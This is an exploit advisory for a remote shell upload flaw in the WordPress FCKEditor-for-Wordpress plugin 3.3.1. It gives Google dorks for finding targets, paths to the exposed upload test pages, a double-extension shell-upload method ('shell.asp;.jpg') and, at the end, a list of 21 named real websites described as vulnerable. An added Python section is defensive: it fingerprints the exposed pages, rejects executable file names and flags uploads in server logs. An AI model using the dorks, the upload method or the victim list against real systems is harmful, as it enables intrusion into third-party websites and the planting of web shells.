#################################################################################################
# Exploit Title : WordPress FCKEditor-For-Wordpress-Plugin 3.3.1 Remote Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 20/12/2018
# Vendor Homepage : wordpress.org/support/plugin/fckeditor-for-wordpress-plugin
# Software Download Link : github.com/kcloze/kcloze-blog/archive/master.zip + github.com/kcloze/kcloze-blog/tree/master/wp-content/plugins/fckeditor-for-wordpress-plugin
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.0 ~ 2.2 ~ 2.6.2 ~ 2.8.4 ~ 3.3.1
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/fckeditor-for-wordpress-plugin/'' + intext:''DESIGN BY PURR.'' + intext:''powered by WordPress. InBiz theme made it free by desain web. Hosting by rozhled.cz'' + intext:''Site entraîné par WordPress | Connexion | Flux (RSS) des articles | Thème Arthemia de Michael Jubel | Stats'' + intext:''designed by Portland Web Design'' + intext:''© 2009 websitemagix.com powered by fotomagix'' + intext:''powered by fotomagix'' + intext:''realizace webu: Pavel Gloss'' + intext:''© 2008 - 2018 Heather Richards Live | All Rights Reserved.'' + intext:''Powered by WordPress ( WordPress Deutschland ) - Handcoded by Tommaso Baldovino - German translation and modification by Schwarze Dame''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] + CWE-434: Unrestricted Upload of File with Dangerous Type
# Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~ ayarsecurity.com [ Friend ]
#################################################################################################
# Exploit :
/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/test.html
/wp-content/plugins/fckeditor-for-wordpress-plugin/fckeditor/editor/filemanager/browser/default/frmupload.html
/wp-content/plugins/fckeditor-for-wordpress-plugin/fckeditor/editor/filemanager/browser/default/browser.html
# Directory File Path :
/wp-content/uploads/.....
/wp-content/uploads/[YEAR]/[MONTH]/......
#################################################################################################
# Note : In the upload test form, select the PHP uploader, then try to upload a file with a double-extension name such as shell.asp;.jpg. The semicolon form only pays off on IIS 6, which stops parsing the path at the semicolon and executes the file as .asp; on Apache or nginx with PHP the connector has to accept a .php (or .phtml) name, and the file only runs if /wp-content/uploads/ is served with PHP execution enabled.
# Note : The fckeditor-for-wordpress-plugin contains a very serious vulnerability that lets an attacker upload, modify and execute files on any WordPress site running it. With the plugin installed, an attacker reaches the web server over plain HTTP through the file-manager test and browser pages that ship in the plugin's directory, which are reachable directly by URL.
#################################################################################################
Vulnerable File Code => /uploadtest.html
*************************************
FCKeditor - Uploaders Tests
[ visible form labels from uploadtest.html; the HTML markup itself is not preserved on this page ]
Select the "File Uploader" to use:
Resource Type
Custom Uploader URL:
Upload a new file:
Uploaded File URL:
Post URL:
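#################################################################################################
# Triage helpers for the paths and the upload note above. This is an added example and is not code from the advisory, from the plugin or from FCKeditor. The four probe paths are the ones the advisory lists; the form-label fingerprint, the executable-extension policy, the common-log-format regex, the connector path in the second sample log line and the sample page and log data are all constructed assumptions for illustration.

```python
"""Triage helpers for the exposed FCKeditor file-manager pages listed above.

Added example, not code from the advisory or from the plugin. The four paths
are the ones the advisory names; the page fingerprint strings, the extension
policy, the connector path in the second log line and all sample data are
constructed assumptions for illustration.
"""
import re
from urllib.parse import urljoin

# Paths named in the advisory, relative to the WordPress root.
FCK_TEST_PATHS = [
    "wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html",
    "wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/test.html",
    "wp-content/plugins/fckeditor-for-wordpress-plugin/fckeditor/editor/filemanager/browser/default/frmupload.html",
    "wp-content/plugins/fckeditor-for-wordpress-plugin/fckeditor/editor/filemanager/browser/default/browser.html",
]

# Labels shown on the stock uploadtest.html form (assumed fingerprint).
FCK_PAGE_MARKERS = ("Uploaders Tests", "Custom Uploader URL", "Uploaded File URL")

# Extensions a connector must never write under a web-served directory
# (assumed policy; extend it for the server's handler map). "htaccess" is
# included because an uploaded .htaccess can re-enable execution on Apache.
EXEC_EXTENSIONS = {
    "php", "php3", "php4", "php5", "php7", "phtml", "phar",
    "asp", "aspx", "asa", "cer", "jsp", "jspx", "cgi", "pl", "htaccess",
}


def candidate_urls(site):
    """URLs to probe on one site (site may carry a sub-path such as /blog)."""
    base = site if site.endswith("/") else site + "/"
    return [urljoin(base, path) for path in FCK_TEST_PATHS]


def looks_like_fck_test_page(status, body):
    """True when a 200 body carries all of the stock test-form labels."""
    return status == 200 and all(marker in body for marker in FCK_PAGE_MARKERS)


def is_dangerous_filename(name):
    """Reject a name if ANY part after the first dot or semicolon is an
    executable extension. Splitting on ';' as well as '.' catches the
    'shell.asp;.jpg' form from the advisory's note, which IIS 6 serves as
    shell.asp because it stops parsing the path at the semicolon."""
    parts = re.split(r"[.;]", name.strip().lower())
    return any(part in EXEC_EXTENSIONS for part in parts[1:])


# Common-log-format request line (assumed format for the sample below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

FCK_DIRS = (
    "/fckeditor-for-wordpress-plugin/filemanager/connectors/",
    "/fckeditor-for-wordpress-plugin/fckeditor/editor/filemanager/",
)


def suspicious_requests(log_lines):
    """Return (ip, method, path, reasons) for hits: any request into the
    plugin's file-manager directories, or a request for an executable-looking
    name under /wp-content/uploads/ (the drop location the advisory gives)."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        reasons = []
        if any(d in path for d in FCK_DIRS):
            reasons.append("fck-filemanager")
        filename = path.split("?", 1)[0].rsplit("/", 1)[-1]
        if "/wp-content/uploads/" in path and is_dangerous_filename(filename):
            reasons.append("exec-in-uploads")
        if reasons:
            hits.append((m.group("ip"), m.group("method"), path, reasons))
    return hits


# Constructed sample data; no real site is represented.
SAMPLE_TEST_PAGE = (
    "<title>FCKeditor - Uploaders Tests</title>"
    "Select the \"File Uploader\" to use: Resource Type "
    "Custom Uploader URL: Upload a new file: Uploaded File URL: Post URL:"
)
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Dec/2018:10:01:02 +0000] "GET /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html HTTP/1.1" 200 2110',
    # Assumed connector path for illustration (not named in the advisory).
    '203.0.113.5 - - [20/Dec/2018:10:01:20 +0000] "POST /wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/php/upload.php?Type=File HTTP/1.1" 200 312',
    '203.0.113.5 - - [20/Dec/2018:10:01:35 +0000] "GET /wp-content/uploads/2018/12/shell.asp;.jpg HTTP/1.1" 200 55',
    '198.51.100.9 - - [20/Dec/2018:10:02:00 +0000] "GET /wp-content/uploads/2018/12/photo.jpg HTTP/1.1" 200 40211',
]

if __name__ == "__main__":
    for url in candidate_urls("https://example.com/blog"):
        print("probe:", url)
    print("fingerprint:", looks_like_fck_test_page(200, SAMPLE_TEST_PAGE))
    for hit in suspicious_requests(SAMPLE_LOG):
        print("hit:", hit)
```

# The fingerprint check is deliberately a 200 plus all three labels: a 403 or a themed 404 page that mentions FCKeditor should not count as an exposed test form. The filename check splits on ';' as well as '.', so it treats shell.asp;.jpg the same way as shell.asp, and it is the rule a hardened connector should apply on the way in, not just a thing to grep for after the fact.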
#################################################################################################
# Example Vulnerable Sites =>
[+] steamykitchen.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] n-vac.co.jp/tool/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] senftenberg.cz/wordpress/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] ville-rochefortdugard.fr/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] jalak.eu/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] carolwhitemarketing.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] etkingrup.com.tr/haber/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] zohnertheater.ch/amberroad/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] gialongvn.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] websitemagix.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] taiyaki-ya.com/wp/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] locthanhphat.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] zko157.cz/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] duolongo.se/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] sof.vn/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] heatherrichardslive.com/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] textmah.com/sites/zane/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] nongngucolam.vn/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] drogy-sos.sk/photoland/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] kukk.de/affiliateblog/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
[+] nttprov.go.id/penghubung/web/wp-content/plugins/fckeditor-for-wordpress-plugin/filemanager/connectors/uploadtest.html
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################